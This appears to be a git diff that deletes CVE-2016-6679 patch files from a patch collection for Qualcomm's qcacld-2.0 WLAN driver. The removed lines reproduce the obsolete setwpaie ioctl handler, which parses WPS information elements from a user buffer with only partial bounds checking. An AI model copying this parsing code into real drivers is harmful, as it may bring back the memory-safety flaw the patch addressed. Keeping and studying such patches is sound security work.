--                      if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT; 
--                      pos += length;
--                      break;
--                   case HDD_WPS_ELEM_RF_BANDS:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.RFBand = *pos;
--                      hddLog(LOG1, "RF band: %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.RFBand);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_RF_BANDS_PRESENT;
--                      pos += 1;
--                      break;
--                   
--                   default:
--                      hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)", (*pos<<8 | *(pos+1)));
--                      ret = -EINVAL;
--                      goto exit;
--                }
--              }  
--            }
--            else { 
--                 hddLog (LOGE, "%s WPS IE Mismatch %X",
--                         __func__, wps_genie[0]);
--            }     
--            break;
--                 
--         default:
--            hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]);
--            ret = -EINVAL;
--            goto exit;
--      }
--    } 
--    else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE)
--    {
--      pSap_WPSIe->sapWPSIECode = eSAP_WPS_PROBE_RSP_IE; 
--      wps_genie = wps_genie + 1;
--      switch ( wps_genie[0] ) 
--      {
--         case DOT11F_EID_WPA: 
--            if (wps_genie[1] < 2 + 4)
--            {
--                ret = -EINVAL;
--                goto exit;
--            }
--            else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) 
--            {
--             hddLog (LOG1, "%s Set WPS PROBE RSP IE(len %d)",__func__, wps_genie[1]+2);
--             pos = &wps_genie[6];
--             while (((size_t)pos - (size_t)&wps_genie[6])  < (wps_genie[1] - 4) )
--             {
--              switch((u_int16_t)(*pos<<8) | *(pos+1))
--              {
--                   case HDD_WPS_ELEM_VERSION:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Version = *pos;   
--                      hddLog(LOG1, "WPS version %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Version);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_VER_PRESENT;   
--                      pos += 1;
--                      break;
--                   
--                   case HDD_WPS_ELEM_WPS_STATE:
--                      pos +=4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.wpsState = *pos;
--                      hddLog(LOG1, "WPS State %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.wpsState);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_STATE_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_APSETUPLOCK:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.APSetupLocked = *pos;
--                      hddLog(LOG1, "AP setup lock %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.APSetupLocked);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_APSETUPLOCK_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_SELECTEDREGISTRA:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistra = *pos;
--                      hddLog(LOG1, "Selected Registra %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistra);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SELECTEDREGISTRA_PRESENT;                      
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_DEVICE_PASSWORD_ID:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DevicePasswordID = (*pos<<8) | *(pos+1);
--                      hddLog(LOG1, "Password ID: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DevicePasswordID);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_DEVICEPASSWORDID_PRESENT;
--                      pos += 2; 
--                      break;
--                   case HDD_WPS_ELEM_REGISTRA_CONF_METHODS:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod = (*pos<<8) | *(pos+1);
--                      hddLog(LOG1, "Select Registra Config Methods: %x", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SELECTEDREGISTRACFGMETHOD_PRESENT;
--                      pos += 2; 
--                      break;
--                  case HDD_WPS_ELEM_RSP_TYPE:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ResponseType = *pos;
--                      hddLog(LOG1, "Config Methods: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ResponseType);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_RESPONSETYPE_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_UUID_E:
--                      pos += 2; 
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT;
--                      pos += length;
--                      break;
--                   
--                   case HDD_WPS_ELEM_MANUFACTURER:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length >  (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length;
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT;
--                      pos += length;
--                      break;
-- 
--                   case HDD_WPS_ELEM_MODEL_NAME:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length;
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT;
--                      pos += length;
--                      break;
--                   case HDD_WPS_ELEM_MODEL_NUM:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length;
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT;
--                      pos += length;
--                      break;
--                   case HDD_WPS_ELEM_SERIAL_NUM:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length;
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT;
--                      pos += length;
--                      break;
--                   case HDD_WPS_ELEM_PRIMARY_DEVICE_TYPE:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory = (*pos<<8 | *(pos+1));
--                      hddLog(LOG1, "primary dev category: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory);
--                      pos += 2;
--                      
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceOUI, pos, HDD_WPS_DEVICE_OUI_LEN);
--                      hddLog(LOG1, "primary dev oui: %02x, %02x, %02x, %02x", pos[0], pos[1], pos[2], pos[3]);
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceSubCategory = (*pos<<8 | *(pos+1));
--                      hddLog(LOG1, "primary dev sub category: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceSubCategory);
--                      pos += 2;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_PRIMARYDEVICETYPE_PRESENT;                      
--                      break;
--                   case HDD_WPS_ELEM_DEVICE_NAME:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length;
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length);
--                      pos += length;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_DEVICENAME_PRESENT;
--                      break;
--                   case HDD_WPS_ELEM_CONFIG_METHODS:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ConfigMethod = (*pos<<8) | *(pos+1);
--                      hddLog(LOG1, "Config Methods: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod);
--                      pos += 2; 
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_CONFIGMETHODS_PRESENT;
--                      break;
-- 
--                   case HDD_WPS_ELEM_RF_BANDS:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.RFBand = *pos;
--                      hddLog(LOG1, "RF band: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.RFBand);
--                      pos += 1;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_RF_BANDS_PRESENT;
--                      break;
--              }  // switch
--            }
--         } 
--         else
--         {
--            hddLog (LOGE, "%s WPS IE Mismatch %X",__func__, wps_genie[0]);
--         }
--         
--      } // switch
--    }
--    halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe);
--    if (halStatus != eHAL_STATUS_SUCCESS)
--        ret = -EINVAL;
--    pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter);
--    if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE)
--    {
--        //hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev));
--        //v_CONTEXT_t pVosContext = pHostapdAdapter->pvosContext;
--        WLANSAP_Update_WpsIe ( pVosContext );
--    }
-- 
--exit:
--    vos_mem_free(pSap_WPSIe);   
--    kfree(fwps_genie);
--    EXIT();
--    return ret;
--}
--
--static int iw_softap_setwpsie(struct net_device *dev,
--                              struct iw_request_info *info,
--                              union iwreq_data *wrqu,
--                              char *extra)
--{
--    int ret;
--
--    vos_ssr_protect(__func__);
--    ret = __iw_softap_setwpsie(dev, info, wrqu, extra);
--    vos_ssr_unprotect(__func__);
--
--    return ret;
--}
- 
- static int __iw_softap_stopbss(struct net_device *dev,
-                              struct iw_request_info *info,
-@@ -4845,8 +4434,6 @@ static const struct iw_priv_args hostapd_private_args[] = {
-       IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1, 0, "setAclMode" },
-   { QCSAP_IOCTL_GET_STAWPAIE,
-       IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 1, 0, "get_staWPAIE" },
--  { QCSAP_IOCTL_SETWPAIE,
--      IW_PRIV_TYPE_BYTE | QCSAP_MAX_WSC_IE | IW_PRIV_SIZE_FIXED, 0, "setwpaie" },
-   { QCSAP_IOCTL_STOPBSS,
-       IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED, 0, "stopbss" },
-   { QCSAP_IOCTL_VERSION, 0,
-@@ -4945,7 +4532,6 @@ static const iw_handler hostapd_private[] = {
-    [QCSAP_IOCTL_SETPARAM - SIOCIWFIRSTPRIV] = iw_softap_setparam,  //set priv ioctl
-    [QCSAP_IOCTL_GETPARAM - SIOCIWFIRSTPRIV] = iw_softap_getparam,  //get priv ioctl   
-    [QCSAP_IOCTL_GET_STAWPAIE - SIOCIWFIRSTPRIV] = iw_get_genie, //get station genIE
--   [QCSAP_IOCTL_SETWPAIE - SIOCIWFIRSTPRIV] = iw_softap_setwpsie,
-    [QCSAP_IOCTL_STOPBSS - SIOCIWFIRSTPRIV] = iw_softap_stopbss,       // stop bss
-    [QCSAP_IOCTL_VERSION - SIOCIWFIRSTPRIV] = iw_softap_version,       // get driver version
-    [QCSAP_IOCTL_GET_WPS_PBC_PROBE_REQ_IES - SIOCIWFIRSTPRIV] = iw_get_WPSPBCProbeReqIEs,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6679/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2016-6679/qcacld-2.0/0002.patch
deleted file mode 100644
index 84609117..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6679/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,478 +0,0 @@
-From f081695446679aa44baa0d00940ea18455eeb4c5 Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <c_saidir@qti.qualcomm.com>
-Date: Thu, 26 May 2016 15:24:26 +0530
-Subject: qcacld-2.0: Remove the support for setwpaie ioctl
-
-This ioctl gets call during the start of SAP/hostapd with wext
-interface and which is obsolete, currently using nl80211 interface
-for the same
-
-Remove the code related to setwpaie ioctl
-
-CRs-Fixed: 1000913
-Change-Id: Ia45860d7143639aa62d02afe8c08e283e20ba27a
----
- CORE/HDD/inc/qc_sap_ioctl.h     |   2 +-
- CORE/HDD/src/wlan_hdd_hostapd.c | 419 ----------------------------------------
- 2 files changed, 1 insertion(+), 420 deletions(-)
-
-diff --git a/CORE/HDD/inc/qc_sap_ioctl.h b/CORE/HDD/inc/qc_sap_ioctl.h
-index 570e6c0..1e52ac9 100644
---- a/CORE/HDD/inc/qc_sap_ioctl.h
-+++ b/CORE/HDD/inc/qc_sap_ioctl.h
-@@ -143,7 +143,7 @@ typedef struct
- #define QCSAP_IOCTL_SET_NONE_GET_THREE      (SIOCIWFIRSTPRIV+3)
- #define WE_GET_TSF 1
- #define QCSAP_IOCTL_GET_STAWPAIE      (SIOCIWFIRSTPRIV+4)
--#define QCSAP_IOCTL_SETWPAIE          (SIOCIWFIRSTPRIV+5)
-+
- #define QCSAP_IOCTL_STOPBSS           (SIOCIWFIRSTPRIV+6)
- #define QCSAP_IOCTL_VERSION           (SIOCIWFIRSTPRIV+7)
- #define QCSAP_IOCTL_GET_WPS_PBC_PROBE_REQ_IES       (SIOCIWFIRSTPRIV+8)
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 40ae5cb..dceb610 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -5270,422 +5270,6 @@ static int iw_get_mode(struct net_device *dev,
- }
- 
- 
--static int __iw_softap_setwpsie(struct net_device *dev,
--                                struct iw_request_info *info,
--                                union iwreq_data *wrqu,
--                                char *extra)
--{
--   hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev));
--#ifndef WLAN_FEATURE_MBSSID
--   v_CONTEXT_t pVosContext;
--#endif
--   hdd_hostapd_state_t *pHostapdState;
--   eHalStatus halStatus= eHAL_STATUS_SUCCESS;
--   u_int8_t *wps_genie;
--   u_int8_t *fwps_genie;
--   u_int8_t *pos;
--   tpSap_WPSIE pSap_WPSIe;
--   u_int8_t WPSIeType;
--   u_int16_t length;
--   struct iw_point s_priv_data;
--   hdd_context_t *hdd_ctx;
--   int ret;
--
--   ENTER();
--
--   if (!capable(CAP_NET_ADMIN)) {
--       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                FL("permission check failed"));
--       return -EPERM;
--   }
--
--   hdd_ctx = WLAN_HDD_GET_CTX(pHostapdAdapter);
--   ret = wlan_hdd_validate_context(hdd_ctx);
--   if (0 != ret)
--       return ret;
--
--#ifndef WLAN_FEATURE_MBSSID
--   pVosContext = hdd_ctx->pvosContext;
--   if (NULL == pVosContext) {
--       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                 "%s: VOS context is not valid ", __func__);
--       return -EINVAL;
--   }
--#endif
--
--   /* helper function to get iwreq_data with compat handling. */
--   if (hdd_priv_get_data(&s_priv_data, wrqu)) {
--      return -EINVAL;
--   }
--
--   if ((NULL == s_priv_data.pointer) ||
--       (s_priv_data.length < QCSAP_MAX_WSC_IE)) {
--      return -EINVAL;
--   }
--
--   wps_genie = mem_alloc_copy_from_user_helper(s_priv_data.pointer,
--                                               s_priv_data.length);
--
--   if (NULL == wps_genie) {
--       hddLog(LOG1,
--              "%s: failed to alloc memory and copy data from user buffer",
--              __func__);
--       return -EFAULT;
--   }
--
--   fwps_genie = wps_genie;
--
--   pSap_WPSIe = vos_mem_malloc(sizeof(tSap_WPSIE));
--   if (NULL == pSap_WPSIe)
--   {
--      hddLog(LOGE, "VOS unable to allocate memory");
--      kfree(fwps_genie);
--      return -ENOMEM;
--   }
--   vos_mem_zero(pSap_WPSIe, sizeof(tSap_WPSIE));
--
--   hddLog(LOG1,"%s WPS IE type[0x%X] IE[0x%X], LEN[%d]", __func__, wps_genie[0], wps_genie[1], wps_genie[2]);
--   WPSIeType = wps_genie[0];
--   if ( wps_genie[0] == eQC_WPS_BEACON_IE)
--   {
--      pSap_WPSIe->sapWPSIECode = eSAP_WPS_BEACON_IE;
--      wps_genie = wps_genie + 1;
--      switch ( wps_genie[0] )
--      {
--         case DOT11F_EID_WPA:
--            if (wps_genie[1] < DOT11F_EID_HEADER_LEN ||
--                wps_genie[1] > DOT11F_IE_WPA_MAX_LEN + DOT11F_EID_HEADER_LEN)
--            {
--                ret = -EINVAL;
--                goto exit;
--            }
--            else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0)
--            {
--             hddLog (LOG1, "%s Set WPS BEACON IE(len %d)",__func__, wps_genie[1]+2);
--             pos = &wps_genie[6];
--             while (((size_t)pos - (size_t)&wps_genie[6])  < (wps_genie[1] - 4) )
--             {
--                switch((u_int16_t)(*pos<<8) | *(pos+1))
--                {
--                   case HDD_WPS_ELEM_VERSION:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.Version = *pos;
--                      hddLog(LOG1, "WPS version %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.Version);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_VER_PRESENT;
--                      pos += 1;
--                      break;
--
--                   case HDD_WPS_ELEM_WPS_STATE:
--                      pos +=4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.wpsState = *pos;
--                      hddLog(LOG1, "WPS State %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.wpsState);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_STATE_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_APSETUPLOCK:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.APSetupLocked = *pos;
--                      hddLog(LOG1, "AP setup lock %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.APSetupLocked);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_APSETUPLOCK_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_SELECTEDREGISTRA:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistra = *pos;
--                      hddLog(LOG1, "Selected Registra %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistra);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_SELECTEDREGISTRA_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_DEVICE_PASSWORD_ID:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.DevicePasswordID = (*pos<<8) | *(pos+1);
--                      hddLog(LOG1, "Password ID: %x", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.DevicePasswordID);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_DEVICEPASSWORDID_PRESENT;
--                      pos += 2;
--                      break;
--                   case HDD_WPS_ELEM_REGISTRA_CONF_METHODS:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistraCfgMethod = (*pos<<8) | *(pos+1);
--                      hddLog(LOG1, "Select Registra Config Methods: %x", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistraCfgMethod);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_SELECTEDREGISTRACFGMETHOD_PRESENT;
--                      pos += 2;
--                      break;
--
--                   case HDD_WPS_ELEM_UUID_E:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT;
--                      pos += length;
--                      break;
--                   case HDD_WPS_ELEM_RF_BANDS:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.RFBand = *pos;
--                      hddLog(LOG1, "RF band: %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.RFBand);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_RF_BANDS_PRESENT;
--                      pos += 1;
--                      break;
--
--                   default:
--                      hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)", (*pos<<8 | *(pos+1)));
--                      ret = -EINVAL;
--                      goto exit;
--                }
--              }
--            }
--            else {
--                 hddLog (LOGE, "%s WPS IE Mismatch %X",
--                         __func__, wps_genie[0]);
--            }
--            break;
--
--         default:
--            hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]);
--            ret = -EINVAL;
--            goto exit;
--      }
--    }
--    else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE)
--    {
--      pSap_WPSIe->sapWPSIECode = eSAP_WPS_PROBE_RSP_IE;
--      wps_genie = wps_genie + 1;
--      switch ( wps_genie[0] )
--      {
--         case DOT11F_EID_WPA:
--            if (wps_genie[1] < DOT11F_EID_HEADER_LEN ||
--                wps_genie[1] > DOT11F_IE_WPA_MAX_LEN + DOT11F_EID_HEADER_LEN)
--            {
--                ret = -EINVAL;
--                goto exit;
--            }
--            else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0)
--            {
--             hddLog (LOG1, "%s Set WPS PROBE RSP IE(len %d)",__func__, wps_genie[1]+2);
--             pos = &wps_genie[6];
--             while (((size_t)pos - (size_t)&wps_genie[6])  < (wps_genie[1] - 4) )
--             {
--              switch((u_int16_t)(*pos<<8) | *(pos+1))
--              {
--                   case HDD_WPS_ELEM_VERSION:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Version = *pos;
--                      hddLog(LOG1, "WPS version %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Version);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_VER_PRESENT;
--                      pos += 1;
--                      break;
--
--                   case HDD_WPS_ELEM_WPS_STATE:
--                      pos +=4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.wpsState = *pos;
--                      hddLog(LOG1, "WPS State %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.wpsState);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_STATE_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_APSETUPLOCK:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.APSetupLocked = *pos;
--                      hddLog(LOG1, "AP setup lock %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.APSetupLocked);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_APSETUPLOCK_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_SELECTEDREGISTRA:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistra = *pos;
--                      hddLog(LOG1, "Selected Registra %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistra);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SELECTEDREGISTRA_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_DEVICE_PASSWORD_ID:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DevicePasswordID = (*pos<<8) | *(pos+1);
--                      hddLog(LOG1, "Password ID: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DevicePasswordID);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_DEVICEPASSWORDID_PRESENT;
--                      pos += 2;
--                      break;
--                   case HDD_WPS_ELEM_REGISTRA_CONF_METHODS:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod = (*pos<<8) | *(pos+1);
--                      hddLog(LOG1, "Select Registra Config Methods: %x", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SELECTEDREGISTRACFGMETHOD_PRESENT;
--                      pos += 2;
--                      break;
--                  case HDD_WPS_ELEM_RSP_TYPE:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ResponseType = *pos;
--                      hddLog(LOG1, "Config Methods: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ResponseType);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_RESPONSETYPE_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_UUID_E:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT;
--                      pos += length;
--                      break;
--
--                   case HDD_WPS_ELEM_MANUFACTURER:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length >  (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name)))
--                      {
--                          ret = -EINVAL;
--                          goto exit;
--                      }
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length;
--                      vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length);
--                      pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT;
--                      pos += length;
--                      break;
--
--                   case HDD_WPS_ELEM_MODEL_NAME:
--                      pos += 2;
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
--                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text)))
--                      {
